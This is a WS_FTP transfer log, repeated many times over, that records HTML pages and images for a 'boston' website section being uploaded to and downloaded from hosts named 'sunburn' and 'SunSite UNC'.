10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
